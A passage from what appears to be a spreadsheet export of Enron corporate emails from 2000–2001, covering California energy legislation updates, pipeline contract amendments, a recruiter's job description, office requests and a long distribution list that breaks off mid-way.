HE 5 was cut by 3 MW, HE 6 was cut by 8.  SDGE HAS ASKED TO TAKE THIS TO REAL _x000D_
TIME._x000D_
_x000D_
Please call and make sure that everything is going ok on this path SATURDAY._x000D_
_x000D_
Thanks,_x000D_
_x000D_
_x000D_
C</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 05:35:41 -0800 (PST)</t>
  </si>
  <si>
    <t>Kimberly-_x000D_
_x000D_
I would like a loaner laptop for the weekend.  Is that possible??  Also, the ice machine by us is not dispensing ice anymore._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Susan_x000D_
_x000D_
P.S.- I promise not to complain about anything next time I write......</t>
  </si>
  <si>
    <t>Wed, 28 Nov 2001 12:46:50 -0800 (PST)</t>
  </si>
  <si>
    <t>looks good to me.  Basically states the main things that I do now.  Thanks._x000D_
PL_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Jennifer Silveira" &lt;jennifers@hiresynergy.com&gt;@ENRON  _x000D_
Sent:	Wednesday, November 28, 2001 2:22 PM_x000D_
To:	Love, Phillip M._x000D_
Subject:	Description_x000D_
_x000D_
_x000D_
Phillip,_x000D_
Here is the job description for Cinergy.   Please let me know what you think.  Thanks!_x000D_
 _x000D_
Sr. Risk Analyst:_x000D_
Cinergy is one of America's leading diversified  energy companies. Our _x000D_
energy merchant business is based on a profitable  balance of asset _x000D_
development, customer origination, marketing and trading,  _x000D_
industrial-site cogeneration and infrastructure development and plant  _x000D_
Provide analytical support for Cinergy's risk management / pricing  processes. _x000D_
Develop mastery of Cinergy's risk management / trading system.  _x000D_
Assess and monitor trading activities from a portfolio risk perspective.  _x000D_
Ensure the validity of price and volatility data through interaction with  trading and energy brokers. _x000D_
Requirements: _x000D_
An undergraduate degree  (graduate degree preferred) in finance, mathematics, engineering, or other  quantitative discipline. _x000D_
Exceptional ability to organize and analyze data.  _x000D_
Strong knowledge of energy derivatives._x000D_
 _x000D_
Jennifer Silveira_x000D_
Recruiter-Hiresynergy,  Inc._x000D_
723 Main St. Suite #511_x000D_
Houston, TX   77002_x000D_
713-222-7667_x000D_
 _x000D_
This message (including any attachments) contains  confidential information intended for a specific individual and purpose, and is  protected by law.  If you are not the intended recipient, you should delete  this message and are hereby notified that any disclosure, copying, or  distribution of this message, or the taking of any action based on it, is  strictly prohibited.</t>
  </si>
  <si>
    <t>Wed, 18 Jul 2001 05:17:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.skilling@enron.com', 'louise.kitchen@enron.com', 'vicki.sharp@enron.com', 'john.lavorato@enron.com', 'b..sanders@enron.com', 'greg.whalley@enron.com', 'kenneth.lay@enron.com', 'e..haedicke@enron.com'})</t>
  </si>
  <si>
    <t>California Update--0717.01</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
---------------------- Forwarded by Steven J Kean/NA/Enron on 07/18/2001 07:15 AM ---------------------------_x000D_
From:	Jeff Dasovich on 07/17/2001 07:31 PM_x000D_
Sent by:	Jeff Dasovich_x000D_
_x000D_
To:	skean@enron.com, Richard Shapiro/NA/Enron@Enron, James D Steffes/NA/Enron@Enron, Susan J Mara/NA/Enron@ENRON, Harry Kingerski/Enron@EnronXGate, Leslie Lawner/Enron@EnronXGate, Michael Tribolet/ENRON@enronXgate, Kristin Walsh/Enron@EnronXGate, Karen Denne/Enron@EnronXGate, mpalmer@enron.com, Janel Guerrero/Enron@EnronXGate, Paul Kaufman/Enron@EnronXGate, Susan M Landwehr/Enron@EnronXGate, Linda Robertson/NA/Enron@ENRON_x000D_
cc:	 _x000D_
_x000D_
Subject:	California Update--0717.01_x000D_
_x000D_
What people know:_x000D_
_x000D_
Hertzberg (et al's) bill (82XX)was heard in an "informational" hearing today and still sits in the Assembly Energy Committee.  It will be heard again tomorrow (perhaps beginning at 10 AM) , at which time parties will have a chance to support/oppose and ask for amendments.  Most, including us, oppose unless significantly amended._x000D_
The Wright (D) -Richman (R) bill (83XX)was heard in an "informational" hearing today and still sits in the Assembly Energy Committee.  It will be heard again tomorrow, at which time parties will have a chance to support/oppose and ask for amendments.  From our perspective, this is the best bill out there yet, though it still has serious problems---it isn't available electronically yet, but should be tomorrow, and I'll distribute then.  The chances of the joint D-R bill being successful are slim, however, since it's up against the Speakers competing bill.  There is talk that the Speaker will try to negotiate with Wright/Richman tonight and include any agreement in his bill (82XX)._x000D_
The original version of the Governor's MOU bill sits in the Senate.  Most believe that Burton will put it up for a vote this week and it will fail._x000D_
The Senate's version of the MOU (Sher-Peace-Kuehl) (78XX)came out today.  It will likely be heard in the committee tomorrow or the next day.  Notably, it kills Direct Access completely and makes Edison shareholders responsible for that portion of Edison's debt owed to suppliers.  In short, a very bad bill._x000D_
Burton's 18XX, which would de-link the bond issuance (to pay back the General Fund) from the DWR contracts is likely to pass the Senate tomorrow or the next day.  Many--including Enron--support the bill (though we are supporting it behind the scenes)._x000D_
_x000D_
What people don't know:_x000D_
Whether there's the time or the will in the Assembly and Senate to achieve by Friday a single, comprehensive bill that can be sent to the governor for his signature. _x000D_
Whether the Legislature would postpone its month-long recess if the Legislature hasn't finished a bill by Friday (most folks think they will not postpone)._x000D_
Whether it's true that, irrespective of the energy issue, the Legislature will fail to get the budget completed by Friday and therefore have to postpone their recess anyway, in which case they might continue to work on the energy legislation at the same time._x000D_
_x000D_
Odds-makers still say it's better than 50-50 that the Legislature does not get the Edison bills done by Friday and leaves on on its 30-day vacation._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
Sacramento is one goofy place._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 Oct 2001 04:50:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.kilmer@enron.com'})</t>
  </si>
  <si>
    <t>FW: Amending Red Rock Contracts</t>
  </si>
  <si>
    <t>What rate amendments?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Miller, Mary Kay  _x000D_
Sent:	Thursday, October 04, 2001 6:09 PM_x000D_
To:	Lokey, Teb; Kirk, Steve; Kilmer III, Robert; Porter, Gregory J.; Darveaux, Mary; Hass, Glen_x000D_
Subject:	RE: Amending Red Rock Contracts_x000D_
_x000D_
What is the status of getting the rate amendments executed?  if they haven't been done why don't we include both in with these?  MK_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lokey, Teb  _x000D_
Sent:	Thursday, October 04, 2001 1:18 PM_x000D_
To:	Kirk, Steve; Miller, Mary Kay; Kilmer III, Robert_x000D_
Subject:	FW: Amending Red Rock Contracts_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Buehler, Craig  _x000D_
Sent:	Thursday, October 04, 2001 9:42 AM_x000D_
To:	Doll, Jeanette; Lokey, Teb_x000D_
Subject:	FW: Amending Red Rock Contracts_x000D_
_x000D_
I believe these are all Negotiated Rate Agreements..._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lokay, Michelle  _x000D_
Sent:	Wednesday, October 03, 2001 3:21 PM_x000D_
To:	Cormier, Martha_x000D_
Cc:	Buehler, Craig; Lee, Dennis; Frazier, Perry_x000D_
Subject:	Amending Red Rock Contracts_x000D_
_x000D_
Oneok #27607 needs the receipt to be amended from East of Thoreau to Westar Ward, PPL#27649 needs to be amended from East of Thoreau to West Texas pool, and PPL#27641 needs to also be amended from East of Thoreau to West Texas pool for 4265/d...the balance of 15735/d will remain at East of Thoreau.  Can we get these contracts amended by this Friday?  Thanks._x000D_
_x000D_
Michelle Lokay_x000D_
Account Director_x000D_
Transwestern Commercial Group_x000D_
713-345-7932</t>
  </si>
  <si>
    <t>Fri, 16 Mar 2001 05:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'barbara.paige@enron.com'})</t>
  </si>
  <si>
    <t>Re: FW: Portfolio Company Presentations - Reminder (Revised)</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Barbara -  does Ken Lay need to be on these e-mails?_x000D_
_x000D_
Rosie_x000D_
_x000D_
_x000D_
From: Barbara Paige/ENRON@enronXgate on 03/16/2001 01:49 PM_x000D_
To: Samantha Bryce/ENRON@enronXgate, Adriana Cortes/ENRON@enronXgate, Monica _x000D_
Edwards/ENRON@enronXgate, Bert Frazier/ENRON@enronXgate, John _x000D_
Godbold/ENRON@enronXgate, Gene Humphrey/ENRON@enronXgate, Micardo _x000D_
Johns/ENRON@enronXgate, Krysti Knight/ENRON@enronXgate, Kenneth _x000D_
Lay/Corp/Enron@ENRON, Mark Lay/ENRON@enronXgate, Olalekan _x000D_
Oladeji/ENRON@enronXgate, Barbara Paige/ENRON@enronXgate, Marc _x000D_
Poulson/ENRON@enronXgate, Lilia Roman/ENRON@enronXgate, Fabricio _x000D_
Soares/ENRON@enronXgate, Claude Tellis/ENRON@enronXgate_x000D_
cc:  _x000D_
Subject: FW: Portfolio Company Presentations - Reminder (Revised)_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Paige, Barbara  _x000D_
Sent: Friday, March 16, 2001 1:47 PM_x000D_
To: Bryce, Samantha; Cortes, Adriana; Edwards, Monica; Frazier, Bert; _x000D_
Godbold, John; Humphrey, Gene; Johns, Micardo; Knight, Krysti; Lay, Kenneth; _x000D_
Lay, Mark; Oladeji, Olalekan; Paige, Barbara; Poulson, Marc; Roman, Lilia; _x000D_
Soares, Fabricio; Tellis, Claude_x000D_
Subject: Portfolio Company Presentations - Reminder_x000D_
_x000D_
Just a reminder that your portfolio company presentations are due on Monday _x000D_
3/19th.  Gene will need to get his copies by mail, so please make sure Lilia _x000D_
has a copy to include in the mailing paket to him by 4PM on Monday.  If you _x000D_
are not planning to meet that deadline, please see Lilia about how you can _x000D_
get your presentation to Gene._x000D_
_x000D_
The first drafts were a good start.  Most, however, read more like a pitch  _x000D_
[Paige, Barbara]  than an assessment/evaluation.  As you make your revisions, _x000D_
keep in mind that your objective should be to provide a succinct, but _x000D_
thorough assessment of the investment that will inform a discussion on how to _x000D_
best add value and manage the investment going forward._x000D_
_x000D_
If you have not gotten my feedback and would like it, we can arrange to speak _x000D_
over the weekend.  I will be traveling, but if you leave a voice message, we _x000D_
can arrange a time to speak.  I will be generally available by phone Saturday _x000D_
morning through early afternoon._x000D_
_x000D_
Thanks,_x000D_
Barbara_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 03:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Voice Mail Outage 4/25-4/26</t>
  </si>
  <si>
    <t xml:space="preserve">At approximately 6:30 pm on 4/25 Ruth Ashe with PGE notified Enron that there will be a voice mail outage starting the evening of 4/25 and running thru 2pm on 4/26.  If you have any questions or concerns please contact her at 503-464-8663 or 503-323-1254.  Thank you for your attention to this matter.  </t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 06:15:14 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pat.shortridge@enron.com'})</t>
  </si>
  <si>
    <t>Friday's call</t>
  </si>
  <si>
    <t xml:space="preserve">On Friday's call, one thing in particular troubled me that I wanted to mention privately.  You said, I believe, that senior management doesn't see a role for government affairs in the SEC/partnership issue.  I think that's a fundamental error._x000D_
_x000D_
I know I haven't been here as long as others, but after five months one things is crystal clear to me: There are people out there who really hate us, commercial competitors, politicians, interest group types, etc.  I fully anticipate they will use recent events as a way to try and do us further harm in the political, regulatory, public perception arenas.  _x000D_
_x000D_
I would hate for our senior management to think that this will play out in a nice orderly legal proceeding where everything is dealt with in terms of facts and reason and law.  I believe this episode will play out more along the lines of CA, though on a smaller scale, where demagogues use this for their own advantages.  _x000D_
_x000D_
I believe gov't affairs needs to play an important role sooner rather than later._x000D_
</t>
  </si>
  <si>
    <t>Thu, 9 Aug 2001 05:42:52 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Emission Credit Curves</t>
  </si>
  <si>
    <t xml:space="preserve">Can you get as much info on this as possible?  I don't think there's much info on this, but I'll call my guy from Cantor.  We'll talk about it this am.  _x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Issler, Paulo  _x000D_
Sent:	Wednesday, August 08, 2001 6:58 PM_x000D_
To:	Woods, Trevor_x000D_
Cc:	Brenner, Ursula; Johnson, Heather A._x000D_
Subject:	Emission Credit Curves_x000D_
_x000D_
Trevor:_x000D_
_x000D_
I work with Heather and she needs to put together historical prices for emission credits for the California-Oregon border._x000D_
Note that this request is comming directly from the Office Of The Chairman and will help Ken and Jeff in their next round of discussions with regulators._x000D_
  _x000D_
Please use your best judgement in which prices and locations you want to elect in your response. I would say that the more liquid the market the better. They do want to see NOX prices for the past 5 years. Feel free to list several time series if you feel it is needed._x000D_
_x000D_
I appreciate your colaboration on that request. It would be great if we can get this by tomorrow (8/10). Please let me know if you need any clarification. _x000D_
_x000D_
Thanks_x000D_
Paulo Issler  </t>
  </si>
  <si>
    <t>Tue, 9 May 2000 01:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'allan.ford@enron.com'})</t>
  </si>
  <si>
    <t>Re: DPR Australia 9 May 2000</t>
  </si>
  <si>
    <t xml:space="preserve">Allan,_x000D_
_x000D_
Please remove Greg Whalley from this distribution list._x000D_
_x000D_
Many Thanks,_x000D_
_x000D_
Liz_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Allan Ford@ENRON_DEVELOPMENT_x000D_
05/09/2000 03:44 AM_x000D_
To: Sue Frusco/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Joseph P _x000D_
Hirl/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Rosalind _x000D_
Ti/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, James A _x000D_
Hughes/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Chris Abel@ENRON_DEVELOPMENT, _x000D_
Heidi Mason/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Rebecca _x000D_
McDonald/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Paul _x000D_
Smith/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Paul _x000D_
Quilkey/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, greg whalley@ect, Raymond _x000D_
Yeow/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, michael.benien@enron.com, Scott _x000D_
Mills@ECT, Sarah Smith/Corp/Enron@Enron, Juana Fayett/Corp/Enron@Enron, John _x000D_
Bowman/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Howard _x000D_
Levy/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jana Morse@Enron_x000D_
cc:  _x000D_
Subject: DPR Australia 9 May 2000_x000D_
_x000D_
_x000D_
2 New Trades_x000D_
_x000D_
PL -38k_x000D_
_x000D_
Futures_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 15 Aug 2000 09:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Bill's speech - and a very funny joke</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.  I didn't receive email yesterday, and I only started receiving them _x000D_
today at 11 AM.  Quesiton:  After Clinton's speech, don't you think the _x000D_
convention is going to cry when they have to sit through Al Gore?  I'm _x000D_
worried----he's so pathetic._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Nancy Sellers &lt;Nancy.Sellers@RobertMondavi.com&gt; on 08/15/2000 08:59:00 AM_x000D_
To: Cameron &lt;cameron@perfect.com&gt;, Jeff Dasovich &lt;Jeff_Dasovich@enron.com&gt;, _x000D_
Prentice- telephia &lt;psellers@telephia.com&gt;, Scott Laughlin _x000D_
&lt;scottwl@hotmail.com&gt;_x000D_
cc:  _x000D_
Subject: Bill's speech - and a very funny joke_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
I thought was pretty awesome!? My favorite was his Harry Truman quote that I _x000D_
had never heard before:? "If you want to live like a Republican, you better _x000D_
vote like a Democrat."? Scotty - maybe that's a line you can use!_x000D_
_x000D_
Joke: _x000D_
Memory Clinic _x000D_
Two elderly couples were enjoying friendly conversation when _x000D_
one of the men asked the other, "Fred, how was the memory _x000D_
clinic you went to last month?" _x000D_
_x000D_
"Outstanding," Fred replied. "They taught us all the latest _x000D_
psychological techniques: visualization, association, etc. _x000D_
It was great." _x000D_
_x000D_
"That's great! And what was the name of the clinic?" _x000D_
_x000D_
Fred went blank. He thought and thought, but couldn't _x000D_
remember. Then a smile broke across his face and he asked, _x000D_
"What do you call that flower with the long stem and _x000D_
thorns?" _x000D_
_x000D_
"You mean a rose?" _x000D_
_x000D_
"Yes, that's it!" _x000D_
_x000D_
He turned to his wife, "Rose, what was the name of that _x000D_
memory clinic?" _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Nancy _x000D_
(707) 251-4870 (phone) _x000D_
(707) 265-5446 (fax) _x000D_
"Plus je bois, mieux je chante" _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 May 2000 03:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tomas.valnek@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'paul.simons@enron.com', 'rod.nelson@enron.com', 'debbie.brackett@enron.com', 'konstantin.malinovski@enron.com', 'markus.fiala@enron.com', 'john.metzler@enron.com', 'william.bradford@enron.com', 'martin.mcdermott@enron.com', 'eklavya.sareen@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Electronic Approval</t>
  </si>
  <si>
    <t xml:space="preserve">Comments...?_x000D_
_x000D_
TV_x000D_
_x000D_
---------------------- Forwarded by Tomas Valnek/LON/ECT on 08/05/2000 10:03 _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Tomas Valnek_x000D_
02/05/2000 18:57_x000D_
To: Debbie R Brackett/HOU/ECT@ECT, William S Bradford/HOU/ECT@ECT, Rod _x000D_
Nelson/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Paul Simons/LON/ECT@ECT_x000D_
cc: Stuart Ffoulkes/LON/ECT@ECT, Simon Duff/LON/ECT@ECT, Bryan _x000D_
Seyfried/LON/ECT@ECT _x000D_
_x000D_
Subject: Electronic Approval_x000D_
_x000D_
Further to some of my recent email attached are two templates for approval _x000D_
forms. They take the same information, expect that one has drop-down menus. _x000D_
Please have a look and give me your comments on contents, functionality...._x000D_
_x000D_
Many thanks_x000D_
_x000D_
Tomas_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 17 Apr 2000 09:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bryan.hull@enron.com', 'david.baumbach@enron.com', 'mary.smith@enron.com', 'lisa.csikos@enron.com', 'daren.farmer@enron.com', 'steve.venturatos@enron.com', 'pat.clynes@enron.com', "o'neal.winfree@enron.com", 'michael.walters@enron.com', 'rita.wynne@enron.com', 'eric.bass@enron.com'})</t>
  </si>
  <si>
    <t>Memo and Presentation from Brian Redmond</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.  I can't tell if all of you were included in this distribution or not.  _x000D_
This was discussed in Brian's staff meeting today._x000D_
---------------------- Forwarded by Brenda F Herod/HOU/ECT on 04/17/2000 _x000D_
04:33 PM ---------------------------_x000D_
_x000D_
_x000D_
Katherine Benedict_x000D_
04/17/2000 03:12 PM_x000D_
To: Phil Lowry/OTS/Enron@ENRON, Jeffrey A Shankman/HOU/ECT@ECT, Raymond _x000D_
Bowen/HOU/ECT@ECT, Timothy J Detmering/HOU/ECT@ECT, Jeff Donahue/HOU/ECT@ECT, _x000D_
Jim Fallon/HOU/ECT@ECT, Max Yzaguirre/NA/Enron@ENRON, John J _x000D_
Lavorato/Corp/Enron@Enron, Scott Josey/Corp/Enron@ENRON, C John _x000D_
Thompson/Corp/Enron@ENRON, Cliff Baxter/HOU/ECT@ECT, Susan _x000D_
Skarness/HOU/ECT@ECT, Janet R Dietrich/HOU/ECT@ECT, James I _x000D_
Ducote/HOU/ECT@ECT, James A Ajello/HOU/ECT@ECT, Rodney Malcolm/HOU/ECT@ECT, _x000D_
Edward Ondarza/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, Christopher F _x000D_
Calger/PDX/ECT@ECT, David Oxley/HOU/ECT@ECT, David W Delainey/HOU/ECT@ECT, _x000D_
John Allario/HOU/ECT@ECT, Patricia Anderson/HOU/ECT@ECT, Jeffrey A _x000D_
Austin/HOU/ECT@ECT, Harold Bertram/HOU/ECT@ECT, Michael C _x000D_
Bilberry/HOU/ECT@ECT, Ted C Bland/HOU/ECT@ECT, Brad Blevins/HOU/ECT@ECT, Greg _x000D_
Brazaitis/HOU/ECT@ECT, Gary Bryan/HOU/ECT@ECT, Candace L _x000D_
Bywaters/HOU/ECT@ECT, Molly L Carriere/HOU/ECT@ECT, Lillian _x000D_
Carroll/HOU/ECT@ECT, Carol Carter/HOU/ECT@ECT, Ginger Causey/HOU/ECT@ECT, Jim _x000D_
Coffey/HOU/ECT@ECT, Robert Cook/HOU/ECT@ECT, Mark Courtney/HOU/ECT@ECT, _x000D_
Robert Crockett/HOU/ECT@ECT, Katherine Crosswhite/HOU/ECT@ECT, Christopher _x000D_
Daniel/HOU/ECT@ECT, Luis Davila/HOU/ECT@ECT, Anita Eisenbrandt/HOU/ECT@ECT, _x000D_
Robert Eickenroht/Corp/Enron@ENRON, William C Falbaum/HOU/ECT@ECT, Sarah _x000D_
Brown/HOU/ECT@ECT, Melissa Graves/HOU/ECT@ECT, Karen Gruesen/HOU/ECT@ECT, _x000D_
James R Haden/HOU/ECT@ECT, Nancy Hall/HOU/ECT@ECT, John Handley/HOU/ECT@ECT, _x000D_
Ned Higgins/HOU/ECT@ECT, Nathan L Hlavaty/HOU/ECT@ECT, Mary Jo _x000D_
Johnson/HOU/ECT@ECT, Kenneth W Kaase/HOU/ECT@ECT, Karry Kendall/HOU/ECT@ECT, _x000D_
Mark Knippa/HOU/ECT@ECT, Gary W Lamphier/HOU/ECT@ECT, Leticia _x000D_
Leal/HOU/ECT@ECT, Catherine Lewis/HOU/ECT@ECT, Tom Liewer/HOU/ECT@ECT, Wayne _x000D_
E Lightfoot/HOU/ECT@ECT, Gerald Lofton/HOU/ECT@ECT, Randal _x000D_
Maffett/HOU/ECT@ECT, Theresa McKinney/HOU/ECT@ECT, Cheryl Lantz _x000D_
Marshall/HOU/ECT@ECT, Jennifer Martinez/HOU/ECT@ECT, Mirna Mejia/HOU/ECT@ECT, _x000D_
Yvette Miroballi/HOU/ECT@ECT, Scott A Monson/HOU/ECT@ECT, Robert D _x000D_
Morgan/HOU/ECT@ECT, Jackie Nelson/HOU/ECT@ECT, Lee L Papayoti/HOU/ECT@ECT, _x000D_
Ken Parker/HOU/ECT@ECT, Adriana Peterson/HOU/ECT@ECT, Meredith _x000D_
Powers/HOU/ECT@ECT, Audrey Pullen/HOU/ECT@ECT, Brian Redmond/HOU/ECT@ECT, _x000D_
Donald P Reinhardt/HOU/ECT@ECT, Brian M Riley/HOU/ECT@ECT, Justin _x000D_
Rostant/HOU/ECT@ECT, Beth A Ryan/HOU/ECT@ECT, Barbara Sargent/HOU/ECT@ECT, _x000D_
John Scarborough/HOU/ECT@ECT, Steve HPL Schneider/HOU/ECT@ECT, Gregory L _x000D_
Sharp/HOU/ECT@ECT, Tom Shelton/HOU/ECT@ECT, Sarah Shimeall/HOU/ECT@ECT, Jack _x000D_
Simunek/HOU/ECT@ECT, Susan Smith/HOU/ECT@ECT, Chris Sonneborn/HOU/ECT@ECT, _x000D_
Dan Staines/HOU/ECT@ECT, Katie Stowers/HOU/ECT@ECT, Vance L _x000D_
Taylor/HOU/ECT@ECT, Ron Tapscott/HOU/ECT@ECT, Davis Thames/HOU/ECT@ECT, _x000D_
Cynthia Tovar/HOU/ECT@ECT, Patrick Wade/HOU/ECT@ECT, Ruby _x000D_
Wagoner/HOU/ECT@ECT, Steve Walton/HOU/ECT@ECT, Rhonda Washington/HOU/ECT@ECT, _x000D_
George Weissman/HOU/ECT@ECT, Doyle E White/HOU/ECT@ECT, Johnnie _x000D_
Williams/HOU/ECT@ECT, Garry D Wilson/HOU/ECT@ECT, Jeffrey L _x000D_
Wilson/HOU/ECT@ECT, Jill T Zivley/HOU/ECT@ECT, Gary A Hanks/HOU/ECT@ECT, Lee _x000D_
Pinkston/HOU/ECT@ECT, Michael C Winders/HOU/ECT@ECT, Sean J _x000D_
Smith/HOU/ECT@ECT, Katherine Benedict/HOU/ECT@ECT, Sean J Smith/HOU/ECT@ECT, _x000D_
Earl Tisdale/HOU/ECT@ECT, Sam Garner/HOU/ECT@ECT, James McKay/HOU/ECT@ECT, _x000D_
Esther Buckley/HOU/ECT@ECT, Xochitl-Alexis Velasco/HOU/ECT@ECT, Jim _x000D_
Schwieger/HOU/ECT@ECT, Mary L Hamilton/HOU/ECT@ECT, Edward D _x000D_
Gottlob/HOU/ECT@ECT, Kenny J Soignet/HOU/ECT@ECT, Lauri A Allen/HOU/ECT@ECT, _x000D_
Michael W Morris/HOU/ECT@ECT, Thomas A Martin/HOU/ECT@ECT, Jennifer _x000D_
Sabine/HOU/ECT@ECT, Lee L Papayoti/HOU/ECT@ECT, Greg McClendon/HOU/ECT@ECT, _x000D_
Elsa Villarreal/HOU/ECT@ECT, Lauri A Allen/HOU/ECT@ECT, Don _x000D_
Baldridge/Corp/Enron@ENRON, Silver Breaux/HOU/ECT@ECT, Esther _x000D_
Buckley/HOU/ECT@ECT, Dan J Bump/DEN/ECT@Enron, James I Ducote/HOU/ECT@ECT, _x000D_
Melanie Facundo/HOU/ECT@ECT, Daren J Farmer/HOU/ECT@ECT, Amy _x000D_
Felling/DEN/ECT@Enron, Sam Garner/HOU/ECT@ECT, Jeff Gilliam/Corp/Enron@ENRON, _x000D_
George Grant/HOU/ECT@ECT, Charlotte Hawkins/HOU/ECT@ECT, Lisa _x000D_
Hesse/HOU/ECT@ECT, James Hoff/DEN/ECT@Enron, Joshua M Langford/HOU/ECT@ECT, _x000D_
Aimee Lannou/HOU/ECT@ECT, Michael J Legler/HOU/ECT@Enron, Paul T _x000D_
Lucci/DEN/ECT@Enron, Robert E Lloyd/HOU/ECT@ECT, Mandy MacKinnon/HOU/ECT@ECT, _x000D_
Thomas A Martin/HOU/ECT@ECT, Greg McClendon/HOU/ECT@ECT, Jennifer _x000D_
Meador/HOU/ECT@ECT, Michael W Morris/HOU/ECT@ECT, Stacey _x000D_
Neuweiler/HOU/ECT@ECT, W Tom Byargeon/HOU/ECT@ECT, Lee Pinkston/HOU/ECT@ECT, _x000D_
Carlos J Rodriguez/HOU/ECT@ECT, William Rome/HOU/ECT@ECT, Kenneth _x000D_
Seaman/HOU/ECT@ECT, Scott Sitter/DEN/ECT@Enron, Mary M Smith/HOU/ECT@ECT, _x000D_
Theresa Staab/Corp/Enron@ENRON, Earl Tisdale/HOU/ECT@ECT, Mark Van _x000D_
Scoyk/Corp/Enron@Enron, Charles Barker Varnell/DEN/ECT@Enron, Kimberly _x000D_
Vaughn/HOU/ECT@ECT, Emma Kam Welsch/HOU/ECT@ECT, Jessica A _x000D_
Wentworth/DEN/ECT@Enron, James Whitehead/Corp/Enron@ENRON, Mark _x000D_
Whitt/DEN/ECT@Enron, Jackie Young/HOU/ECT@ECT, Anthony Austin/HOU/ECT@ECT, _x000D_
Cassandra Pollack/Corp/Enron@ENRON, Kevin Kuehler/Corp/Enron@ENRON, Eugene _x000D_
Peabody/GCO/Enron@Enron, Bob Camp/GCO/Enron@Enron, Rodney _x000D_
Rogers/GCO/Enron@Enron, Tom Fry/GCO/Enron@Enron, Dick Danes/GCO/Enron@ENRON, _x000D_
Joe Zernicek/GCO/Enron@Enron, Calvin Dodd/GCO/Enron@Enron, Bac Thi _x000D_
Ly/GCO/Enron@Enron, Robert Geheb/GCO/Enron@Enron, Valerie _x000D_
Urbanek/Corp/Enron@ENRON, J R Fosdick/GCO/Enron@Enron, Vicente _x000D_
Sarmiento/GCO/Enron@Enron, Reid Hansen/GCO/Enron@Enron, Gayle _x000D_
Pritchard/GCO/Enron@ENRON, Dan Pribble/OTS/Enron@ENRON, Perry _x000D_
Roberts/GCO/Enron@ENRON, Morris Brassfield/OTS/Enron@ENRON, John _x000D_
Towles/OTS/Enron@ENRON, Debbie Boudar/OTS/Enron@ENRON, David _x000D_
Sinclair/OTS/Enron@ENRON, Johnny McGee/OTS/Enron@ENRON, Roger _x000D_
Westbrook/OTS/Enron@ENRON, Hope Acosta/OTS/Enron@ENRON, Ken _x000D_
Parker/HOU/ECT@ECT, Stephen Perry/OTS/Enron@ENRON, Nick _x000D_
Cocavessis/Corp/Enron@ENRON, Steve Venturatos/HOU/ECT@ECT, Glenn _x000D_
Gregory/GCO/Enron@ENRON, Ty Porche/GCO/Enron@ENRON, Don _x000D_
Thomas/GCO/Enron@Enron, Ronald Surber/GCO/Enron@ENRON, Jacob _x000D_
Krautsch/GCO/Enron@ENRON, Gerry Boyd/GCO/Enron@ENRON, Maurice _x000D_
Rayburn/GCO/Enron@ENRON, Jesse Logan/GCO/Enron@ENRON, Alan _x000D_
Locke/GCO/Enron@ENRON, Alan Van Blarcum/GCO/Enron@ENRON, Brenda F _x000D_
Herod/HOU/ECT@ECT, Pat Clynes/Corp/Enron@ENRON, Troy Denetsosie/HOU/ECT@ECT, _x000D_
Ryan Hinze/Corp/Enron@ENRON, Peter Bennett/Corp/Enron@ENRON, Ron _x000D_
Green/Corp/Enron@Enron, Karl E Atkins/OTS/Enron@ENRON, Robert _x000D_
Rose/OTS/Enron@ENRON, Roger Spiller/OTS/Enron@ENRON, Kelley _x000D_
Myers/GCO/Enron@ENRON, Kenny Cooper/GCO/Enron@ENRON, John _x000D_
